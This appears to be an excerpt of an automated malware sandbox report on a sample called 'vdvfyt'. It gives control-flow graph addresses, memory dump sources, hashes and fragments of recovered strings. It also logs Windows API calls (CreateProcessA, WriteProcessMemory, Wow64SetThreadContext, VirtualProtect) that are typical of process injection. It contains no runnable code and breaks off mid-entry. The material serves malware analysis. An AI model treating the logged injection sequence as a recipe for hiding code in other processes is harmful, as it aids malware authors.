                                                                                                                                  • Opcode ID: a963b66e84e65c5f2626459eb0cbe4b47df1fc17c98cb346aed577d642ae7e94
                                                                                                                                  • Instruction ID: 6e533e029d0e266744f1548c7b61aa21887e06814061669ed008cb7ca2485c7e
                                                                                                                                  • Opcode Fuzzy Hash: a963b66e84e65c5f2626459eb0cbe4b47df1fc17c98cb346aed577d642ae7e94
                                                                                                                                  • Instruction Fuzzy Hash: E351363270426A4FC755CF7DD8406AE7BE6EFC5720B2844AAE445CB392CA35DD02C7A1

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 2312 6c429d0-6c429f8 2313 6c429ff-6c42a28 2312->2313 2314 6c429fa 2312->2314 2315 6c42a49 2313->2315 2316 6c42a2a-6c42a33 2313->2316 2314->2313 2317 6c42a4c-6c42a50 2315->2317 2318 6c42a35-6c42a38 2316->2318 2319 6c42a3a-6c42a3d 2316->2319 2320 6c42e07-6c42e1e 2317->2320 2321 6c42a47 2318->2321 2319->2321 2323 6c42e24-6c42e28 2320->2323 2324 6c42a55-6c42a59 2320->2324 2321->2317 2325 6c42e5d-6c42e61 2323->2325 2326 6c42e2a-6c42e5a 2323->2326 2327 6c42a5e-6c42a62 2324->2327 2328 6c42a5b-6c42ab8 2324->2328 2332 6c42e82 2325->2332 2333 6c42e63-6c42e6c 2325->2333 2326->2325 2330 6c42a64-6c42a88 2327->2330 2331 6c42a8b-6c42aa6 2327->2331 2335 6c42abd-6c42ac1 2328->2335 2336 6c42aba-6c42b2b 2328->2336 2330->2331 2349 6c42aae-6c42aaf 2331->2349 2339 6c42e85-6c42e8b 2332->2339 2337 6c42e73-6c42e76 2333->2337 2338 6c42e6e-6c42e71 2333->2338 2342 6c42ac3-6c42ae7 2335->2342 2343 6c42aea-6c42afb 2335->2343 2347 6c42b30-6c42b34 2336->2347 2348 6c42b2d-6c42b8a 2336->2348 2345 6c42e80 2337->2345 2338->2345 2342->2343 2360 6c42b04-6c42b11 2343->2360 2345->2339 2351 6c42b36-6c42b5a 2347->2351 2352 6c42b5d-6c42b81 2347->2352 2356 6c42b8c-6c42be8 2348->2356 2357 6c42b8f-6c42b93 2348->2357 2349->2320 2351->2352 2352->2320 2369 6c42bed-6c42bf1 2356->2369 2370 6c42bea-6c42c4c 2356->2370 2362 6c42b95-6c42bb9 2357->2362 2363 6c42bbc-6c42bbf 2357->2363 2367 6c42b21-6c42b22 2360->2367 2368 6c42b13-6c42b19 2360->2368 2362->2363 2371 6c42bc7-6c42bdf 2363->2371 2367->2320 2368->2367 2374 6c42bf3-6c42c17 2369->2374 2375 6c42c1a-6c42c32 2369->2375 2379 6c42c51-6c42c55 2370->2379 2380 6c42c4e-6c42cb0 2370->2380 2371->2320 2374->2375 2389 6c42c34-6c42c3a 2375->2389 2390 6c42c42-6c42c43 2375->2390 2383 6c42c57-6c42c7b 2379->2383 2384 6c42c7e-6c42c96 2379->2384 2391 6c42cb5-6c42cb9 2380->2391 2392 6c42cb2-6c42d14 2380->2392 2383->2384 2400 6c42ca6-6c42ca7 2384->2400 2401 6c42c98-6c42c9e 2384->2401 2389->2390 2390->2320 2394 6c42ce2-6c42cfa 2391->2394 2395 6c42cbb-6c42cdf 2391->2395 2402 6c42d16-6c42d78 2392->2402 2403 6c42d19-6c42d1d 2392->2403 2411 6c42cfc-6c42d02 2394->2411 2412 6c42d0a-6c42d0b 2394->2412 2395->2394 2400->2320 2401->2400 2413 6c42d7d-6c42d81 2402->2413 2414 6c42d7a-6c42dd3 2402->2414 2405 6c42d46-6c42d5e 2403->2405 2406 6c42d1f-6c42d43 2403->2406 2422 6c42d60-6c42d66 2405->2422 2423 6c42d6e-6c42d6f 2405->2423 2406->2405 2411->2412 2412->2320 2416 6c42d83-6c42da7 2413->2416 2417 6c42daa-6c42dcd 2413->2417 2424 6c42dd5-6c42df9 2414->2424 2425 6c42dfc-6c42dff 2414->2425 2416->2417 2417->2320 2422->2423 2423->2320 2424->2425 2425->2320
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2513733584.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6c40000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 4']q$4']q
                                                                                                                                  • API String ID: 0-3120983240
                                                                                                                                  • Opcode ID: 043ae109a60897b089f5383ba35201b6f2d64773500970412c80a3adfec8ebf9
                                                                                                                                  • Instruction ID: a4a5e42cb869b49fc7d94c48d2f0e745921d824fce133297ca246661f24ecade
                                                                                                                                  • Opcode Fuzzy Hash: 043ae109a60897b089f5383ba35201b6f2d64773500970412c80a3adfec8ebf9
                                                                                                                                  • Instruction Fuzzy Hash: 11F10574E01208DFDB98EFA8E4896EDBBB6FF49311F205469E406A7354CB785A81CF50

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 2437 6dcb460-6dcb472 2438 6dcb49c-6dcb4a0 2437->2438 2439 6dcb474-6dcb495 2437->2439 2440 6dcb4ac-6dcb4bb 2438->2440 2441 6dcb4a2-6dcb4a4 2438->2441 2439->2438 2443 6dcb4bd 2440->2443 2444 6dcb4c7-6dcb4f3 2440->2444 2441->2440 2443->2444 2447 6dcb4f9-6dcb4ff 2444->2447 2448 6dcb720-6dcb767 2444->2448 2449 6dcb505-6dcb50b 2447->2449 2450 6dcb5d1-6dcb5d5 2447->2450 2477 6dcb77d-6dcb789 2448->2477 2478 6dcb769 2448->2478 2449->2448 2452 6dcb511-6dcb51e 2449->2452 2453 6dcb5f8-6dcb601 2450->2453 2454 6dcb5d7-6dcb5e0 2450->2454 2456 6dcb524-6dcb52d 2452->2456 2457 6dcb5b0-6dcb5b9 2452->2457 2459 6dcb626-6dcb629 2453->2459 2460 6dcb603-6dcb623 2453->2460 2454->2448 2458 6dcb5e6-6dcb5f6 2454->2458 2456->2448 2462 6dcb533-6dcb54b 2456->2462 2457->2448 2461 6dcb5bf-6dcb5cb 2457->2461 2463 6dcb62c-6dcb632 2458->2463 2459->2463 2460->2459 2461->2449 2461->2450 2465 6dcb54d 2462->2465 2466 6dcb557-6dcb569 2462->2466 2463->2448 2468 6dcb638-6dcb64b 2463->2468 2465->2466 2466->2457 2475 6dcb56b-6dcb571 2466->2475 2468->2448 2470 6dcb651-6dcb661 2468->2470 2470->2448 2471 6dcb667-6dcb674 2470->2471 2471->2448 2474 6dcb67a-6dcb68f 2471->2474 2474->2448 2488 6dcb695-6dcb6b8 2474->2488 2479 6dcb57d-6dcb583 2475->2479 2480 6dcb573 2475->2480 2483 6dcb78b 2477->2483 2484 6dcb795-6dcb7b1 2477->2484 2481 6dcb76c-6dcb76e 2478->2481 2479->2448 2485 6dcb589-6dcb5ad 2479->2485 2480->2479 2486 6dcb770-6dcb77b 2481->2486 2487 6dcb7b2-6dcb7df call 6dc6cc0 2481->2487 2483->2484 2486->2477 2486->2481 2499 6dcb7f7-6dcb7f9 2487->2499 2500 6dcb7e1-6dcb7e7 2487->2500 2488->2448 2493 6dcb6ba-6dcb6c5 2488->2493 2496 6dcb716-6dcb71d 2493->2496 2497 6dcb6c7-6dcb6d1 2493->2497 2497->2496 2505 6dcb6d3-6dcb6e9 2497->2505 2523 6dcb7fb call 6dcb878 2499->2523 2524 6dcb7fb call 6dcb869 2499->2524 2525 6dcb7fb call 6dcca11 2499->2525 2501 6dcb7e9 2500->2501 2502 6dcb7eb-6dcb7ed 2500->2502 2501->2499 2502->2499 2504 6dcb801-6dcb805 2506 6dcb807-6dcb81e 2504->2506 2507 6dcb850-6dcb860 2504->2507 2511 6dcb6eb 2505->2511 2512 6dcb6f5-6dcb70e 2505->2512 2506->2507 2515 6dcb820-6dcb82a 2506->2515 2511->2512 2512->2496 2518 6dcb82c-6dcb83b 2515->2518 2519 6dcb83d-6dcb84d 2515->2519 2518->2519 2523->2504 2524->2504 2525->2504
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2514129301.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6dc0000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: (aq$d
                                                                                                                                  • API String ID: 0-3557608343
                                                                                                                                  • Opcode ID: 88eaf32a5f94f38b10757be7f3d10d64812e3f8ccdf354f00623a9a65bdac896
                                                                                                                                  • Instruction ID: ebae81048257eb35f362c6b35ed3cd12f768ac620103f0e2d398e51f219e926e
                                                                                                                                  • Opcode Fuzzy Hash: 88eaf32a5f94f38b10757be7f3d10d64812e3f8ccdf354f00623a9a65bdac896
                                                                                                                                  • Instruction Fuzzy Hash: BFD16D34A0060ACFC715CF19C58496ABBF6FF88324B15C55ED85A8B7A5DB30F845CBA1

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 2526 6c43968-6c4398d 2527 6c43994-6c439b3 2526->2527 2528 6c4398f 2526->2528 2529 6c439d4 2527->2529 2530 6c439b5-6c439be 2527->2530 2528->2527 2533 6c439d7-6c439db 2529->2533 2531 6c439c5-6c439c8 2530->2531 2532 6c439c0-6c439c3 2530->2532 2534 6c439d2 2531->2534 2532->2534 2535 6c43b96-6c43bad 2533->2535 2534->2533 2537 6c439e0-6c439e4 2535->2537 2538 6c43bb3-6c43bb7 2535->2538 2541 6c439e6-6c43a41 2537->2541 2542 6c439e9-6c439ed 2537->2542 2539 6c43be0-6c43be4 2538->2539 2540 6c43bb9-6c43bdd 2538->2540 2546 6c43c05 2539->2546 2547 6c43be6-6c43bef 2539->2547 2540->2539 2550 6c43a46-6c43a4a 2541->2550 2551 6c43a43-6c43aa4 2541->2551 2544 6c43a16-6c43a38 2542->2544 2545 6c439ef-6c43a13 2542->2545 2544->2535 2545->2544 2548 6c43c08-6c43c0e 2546->2548 2552 6c43bf6-6c43bf9 2547->2552 2553 6c43bf1-6c43bf4 2547->2553 2556 6c43a73-6c43a8a 2550->2556 2557 6c43a4c-6c43a70 2550->2557 2561 6c43aa6-6c43b07 2551->2561 2562 6c43aa9-6c43aad 2551->2562 2559 6c43c03 2552->2559 2553->2559 2570 6c43a8c-6c43a92 2556->2570 2571 6c43a9a-6c43a9b 2556->2571 2557->2556 2559->2548 2572 6c43b0c-6c43b10 2561->2572 2573 6c43b09-6c43b62 2561->2573 2566 6c43ad6-6c43aed 2562->2566 2567 6c43aaf-6c43ad3 2562->2567 2582 6c43afd-6c43afe 2566->2582 2583 6c43aef-6c43af5 2566->2583 2567->2566 2570->2571 2571->2535 2578 6c43b12-6c43b36 2572->2578 2579 6c43b39-6c43b5c 2572->2579 2584 6c43b64-6c43b88 2573->2584 2585 6c43b8b-6c43b8e 2573->2585 2578->2579 2579->2535 2582->2535 2583->2582 2584->2585 2585->2535
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2513733584.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6c40000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 4']q$4']q
                                                                                                                                  • API String ID: 0-3120983240
                                                                                                                                  • Opcode ID: df46e3771c876e54b8756e772d12a9fbe7becfd53313d4fc556bf54ed4c6a289
                                                                                                                                  • Instruction ID: ccf6d235c6f1d02dee8d2a39712b69f18d16a9aefe4fc322802a1706e563aee0
                                                                                                                                  • Opcode Fuzzy Hash: df46e3771c876e54b8756e772d12a9fbe7becfd53313d4fc556bf54ed4c6a289
                                                                                                                                  • Instruction Fuzzy Hash: 0191F070E01248CFCB98EFAAD4946EDBBB2FF89301F109069D41AB7290CB756941CF64
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2514129301.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6dc0000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: (aq$Haq
                                                                                                                                  • API String ID: 0-3785302501
                                                                                                                                  • Opcode ID: 0d8958dc83d4b1171dd9f6601a8a2cef983ca6100056a9e4ae86db3755424f3b
                                                                                                                                  • Instruction ID: 1ffab38a4b83678a1514fc6d8f1e28214536dfd791635e3a31f5aa860fec7737
                                                                                                                                  • Opcode Fuzzy Hash: 0d8958dc83d4b1171dd9f6601a8a2cef983ca6100056a9e4ae86db3755424f3b
                                                                                                                                  • Instruction Fuzzy Hash: B4519B31B002568FC799AF38C854A6E7BA7FF85311B1045ACE5068B3A5CF35EC06CBA1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2514129301.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6dc0000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: (aq$(aq
                                                                                                                                  • API String ID: 0-3916115647
                                                                                                                                  • Opcode ID: 7f309d73c1aa8b672b38d792a0fa1bc1aa84cf7d60fe303f042009de230073b5
                                                                                                                                  • Instruction ID: f20749cbf22755839051b2ae4555d65c7b5b517e377a7279013c1d2a31f2da7f
                                                                                                                                  • Opcode Fuzzy Hash: 7f309d73c1aa8b672b38d792a0fa1bc1aa84cf7d60fe303f042009de230073b5
                                                                                                                                  • Instruction Fuzzy Hash: 0A51CE3170021A9FDB589F29D854AAE3BA6FF85311F148069F906CB3A5CF35DC42CBA1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2514129301.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6dc0000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: p`]q$p`]q
                                                                                                                                  • API String ID: 0-2072224024
                                                                                                                                  • Opcode ID: a823c5d3ebb1171e085184d92ad39a6a5966c24f9a59606f4feb3e11a1c5a1a3
                                                                                                                                  • Instruction ID: c583ff29691dbbf2b71be52f71ae4324b55b634b205bcb46f2bfd43e0c6bffa5
                                                                                                                                  • Opcode Fuzzy Hash: a823c5d3ebb1171e085184d92ad39a6a5966c24f9a59606f4feb3e11a1c5a1a3
                                                                                                                                  • Instruction Fuzzy Hash: 8E413A71A083498FC751CFACE440AAABFF5EF46320F1884AFE480DB252D630E954C7A1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2514129301.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6dc0000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: ,aq
                                                                                                                                  • API String ID: 0-3092978723
                                                                                                                                  • Opcode ID: 27333e160bbe9fa68af0b0b00e62a6e9d032bb9e7925f97442da5cf541af1161
                                                                                                                                  • Instruction ID: aa0cf15450d6357ea3d95620675c33dc9a357c71ee63231e3b4bb9d93343ad1a
                                                                                                                                  • Opcode Fuzzy Hash: 27333e160bbe9fa68af0b0b00e62a6e9d032bb9e7925f97442da5cf541af1161
                                                                                                                                  • Instruction Fuzzy Hash: 705208B5A002288FDB64CF69C985BADBBF6FF88310F1541D9E509A7351DA309E81CF61
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2514129301.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6dc0000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: (_]q
                                                                                                                                  • API String ID: 0-188044275
                                                                                                                                  • Opcode ID: 4c24b12c8f5a936959b7a4927fb0f4ed113a9b3ca63c8da9dfce34cc13739f98
                                                                                                                                  • Instruction ID: 959e311f8c7f9a543339e3155c5d3af6c0967375346135e8075f7d0aab970d43
                                                                                                                                  • Opcode Fuzzy Hash: 4c24b12c8f5a936959b7a4927fb0f4ed113a9b3ca63c8da9dfce34cc13739f98
                                                                                                                                  • Instruction Fuzzy Hash: 6A226A35A002099FDB44CFA8D495AA9BBF6FF88310F158159E9059F3A5CB71ED41CBA0
                                                                                                                                  APIs
                                                                                                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0618F91A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2511948888.0000000006180000.00000040.00000800.00020000.00000000.sdmp, Offset: 06180000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6180000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                  • Opcode ID: 4ea0da2a5b5de8d932432f9cfbddb5de1130db8c82111667c96053b7b92bc226
                                                                                                                                  • Instruction ID: c67474e188224a72e73d3a1fc92485ed766d9fb7935566f2d576a04e9974d882
                                                                                                                                  • Opcode Fuzzy Hash: 4ea0da2a5b5de8d932432f9cfbddb5de1130db8c82111667c96053b7b92bc226
                                                                                                                                  • Instruction Fuzzy Hash: 96814571D002199FDB50EFAAC8817EEBBF2AF49354F148529E858E7284D7349882CF81
                                                                                                                                  APIs
                                                                                                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0618F91A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2511948888.0000000006180000.00000040.00000800.00020000.00000000.sdmp, Offset: 06180000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6180000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                  • Opcode ID: 29954e17c136386eecad1d87aea9d6a098acddb4cc21116ce2f7c36a6becd837
                                                                                                                                  • Instruction ID: be62e2de11d0b914d11ef093debbea80bfd710e54f036bdd05f964a1ed7fefa3
                                                                                                                                  • Opcode Fuzzy Hash: 29954e17c136386eecad1d87aea9d6a098acddb4cc21116ce2f7c36a6becd837
                                                                                                                                  • Instruction Fuzzy Hash: D7813571D002199FDB50EFAAC9817ADBBF2BF49354F148529E858E7284D7749882CF81
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2497971779.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_2660000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HandleModule
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4139908857-0
                                                                                                                                  • Opcode ID: 35c00583197ed6b7d9665889cec32bf2b9138bac7b604edf4216102e8d19fac0
                                                                                                                                  • Instruction ID: c6199ad70be5af50ed5fe015c1efad93dba2b39984cdd010a31fce6a04f8fbf8
                                                                                                                                  • Opcode Fuzzy Hash: 35c00583197ed6b7d9665889cec32bf2b9138bac7b604edf4216102e8d19fac0
                                                                                                                                  • Instruction Fuzzy Hash: 89710070A00B058FD724DF6AD5457AABBE5FF88308F008929D48AEBB50D735E945CBA4
                                                                                                                                  APIs
                                                                                                                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 061601E0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2511920080.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6160000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MemoryProcessWrite
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3559483778-0
                                                                                                                                  • Opcode ID: 57cc9f3ea1a2a71dad4a132c5460c156a229a354a9905a5c05d8897994416b02
                                                                                                                                  • Instruction ID: 86cb2131e3e8b1ca090ce73acd19b42a1119f08f70a6fac8bc3feccd9fc95d88
                                                                                                                                  • Opcode Fuzzy Hash: 57cc9f3ea1a2a71dad4a132c5460c156a229a354a9905a5c05d8897994416b02
                                                                                                                                  • Instruction Fuzzy Hash: C32146B5D003499FCB10CFAAC985BEEBBF5FF48314F10842AE958A7240C7789950CBA0
                                                                                                                                  APIs
                                                                                                                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 061601E0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2511920080.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6160000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MemoryProcessWrite
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3559483778-0
                                                                                                                                  • Opcode ID: 3aaee7873461bdf38cc6cf9057a9bf4cc4670661c7dd8062693b808a02a3dd45
                                                                                                                                  • Instruction ID: e49387f2adcbc6c3d62d1f119747cfc594bc1fd9a80d33d052c6aab342c9fa93
                                                                                                                                  • Opcode Fuzzy Hash: 3aaee7873461bdf38cc6cf9057a9bf4cc4670661c7dd8062693b808a02a3dd45
                                                                                                                                  • Instruction Fuzzy Hash: AA2136B5D003099FCB10DFAAC985BEEBBF5FF48314F10842AE919A7240C7789954CBA0
                                                                                                                                  APIs
                                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0618FF86
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2511948888.0000000006180000.00000040.00000800.00020000.00000000.sdmp, Offset: 06180000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6180000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ContextThreadWow64
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 983334009-0
                                                                                                                                  • Opcode ID: b8fcb729aae797aae4f9621e4d51fc3232fedfa06a69cf76a503b4184bc5d395
                                                                                                                                  • Instruction ID: ea7009142cce9ea7be241fd3e3899b1eaf37c14928912bf2055d7eec62bfd300
                                                                                                                                  • Opcode Fuzzy Hash: b8fcb729aae797aae4f9621e4d51fc3232fedfa06a69cf76a503b4184bc5d395
                                                                                                                                  • Instruction Fuzzy Hash: 992125B1D002099FDB10DFAAC5857EEBFF4EF49314F14842AE559A7240CB78A985CFA1
                                                                                                                                  APIs
                                                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0266DD4E,?,?,?,?,?), ref: 0266DE0F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2497971779.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_2660000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DuplicateHandle
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3793708945-0
                                                                                                                                  • Opcode ID: db76e4ed115bc792722762815fd96744f05482f66c9194142471f154c3626dc5
                                                                                                                                  • Instruction ID: a1ff899c47ac02efbeb165fee4399b9d5bf5f5f60e99ed5b926a8684cf9b6740
                                                                                                                                  • Opcode Fuzzy Hash: db76e4ed115bc792722762815fd96744f05482f66c9194142471f154c3626dc5
                                                                                                                                  • Instruction Fuzzy Hash: 4F21E6B59002499FDB10CF9AD984AEEFBF4FB58314F14805AE914A7350D378A950CFA4
                                                                                                                                  APIs
                                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0618FF86
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2511948888.0000000006180000.00000040.00000800.00020000.00000000.sdmp, Offset: 06180000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6180000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ContextThreadWow64
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 983334009-0
                                                                                                                                  • Opcode ID: 5c7f53c8c827ebad39add5a54643df44c40581a8af78b6470c18c233b99cca6f
                                                                                                                                  • Instruction ID: c9abef8ea099f625f7721037d9736fb0b4e8b67e7a35af64f0df3ae2fc2efb6f
                                                                                                                                  • Opcode Fuzzy Hash: 5c7f53c8c827ebad39add5a54643df44c40581a8af78b6470c18c233b99cca6f
                                                                                                                                  • Instruction Fuzzy Hash: AA2104B1D002098FDB10DFAAC5857AEBBF4EF59314F14842AD519A7240CB78A945CFA5
                                                                                                                                  APIs
                                                                                                                                  • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06DBDB6C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2514071565.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6db0000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 544645111-0
                                                                                                                                  • Opcode ID: 6a4f3a79e2a30514d6332a36bb946cb0af44331f4e13c61fc0ebb84585603075
                                                                                                                                  • Instruction ID: ae29f82fa8e3e1c5e6937b616bb3028ed077b1ea2525412b73c0d45abf6d7cc6
                                                                                                                                  • Opcode Fuzzy Hash: 6a4f3a79e2a30514d6332a36bb946cb0af44331f4e13c61fc0ebb84585603075
                                                                                                                                  • Instruction Fuzzy Hash: F62134B18002098ECB10DFAAC484BEEFBF5FF48320F10842AD559A7240CB389945DFA4
                                                                                                                                  APIs
                                                                                                                                  • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06DBDB6C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2514071565.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6db0000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 544645111-0
                                                                                                                                  • Opcode ID: 7d01706ab395356bcb00fbaad1b2e9fd099e3ddd99b08de8a653fc5ab6e89399
                                                                                                                                  • Instruction ID: 2b72421fc5b37c238018a7b6a6e024d58eec392bf7dd3f2c2fd8a67eab7b4ca8
                                                                                                                                  • Opcode Fuzzy Hash: 7d01706ab395356bcb00fbaad1b2e9fd099e3ddd99b08de8a653fc5ab6e89399
                                                                                                                                  • Instruction Fuzzy Hash: B72113B1C002098FDB10DFAAC844AEEFBF5EF48320F10842AD519A7240CB78A945CFA5
                                                                                                                                  APIs
                                                                                                                                  • VirtualProtect.KERNEL32(?,?,?,?), ref: 06E7D34C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2514327490.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6e70000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 544645111-0
                                                                                                                                  • Opcode ID: e08247a7317fbc79237ed58bfc6c97e40fdffee23b6bc912df27cdae729cd5a5
                                                                                                                                  • Instruction ID: 69caa15088914e491ad42d24754898f57dc12eb1144face25a4f738debb28374
                                                                                                                                  • Opcode Fuzzy Hash: e08247a7317fbc79237ed58bfc6c97e40fdffee23b6bc912df27cdae729cd5a5
                                                                                                                                  • Instruction Fuzzy Hash: 6A11F4B1D002099FCB10DFAAC844AAEFBF5FF48314F10842AD519A7250C779A945CFA1
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2514071565.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6db0000_vdvfyt.jbxd
